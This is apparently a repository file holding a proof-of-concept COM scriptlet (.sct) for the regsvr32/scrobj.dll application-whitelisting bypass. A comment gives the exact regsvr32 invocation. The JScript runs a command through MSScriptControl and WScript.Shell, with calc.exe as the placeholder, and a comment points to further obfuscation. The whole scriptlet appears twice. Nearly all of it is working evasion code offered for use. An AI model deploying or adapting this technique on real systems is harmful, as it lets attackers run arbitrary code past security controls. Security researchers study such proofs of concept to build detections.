nicholasmckinney/example.sct

## example.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
		//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll

		var scr = new ActiveXObject("MSScriptControl.ScriptControl");
		scr.Language = "JScript";
		scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
		scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');

		//https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
		//Lots of hints here on futher obfuscation
		]]></script>
</registration>
</scriptlet>
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
	//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll

	var scr = new ActiveXObject("MSScriptControl.ScriptControl");
	scr.Language = "JScript";
	scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
	scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');

	//https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
	//Lots of hints here on futher obfuscation
	]]></script>
	</registration>
	</scriptlet>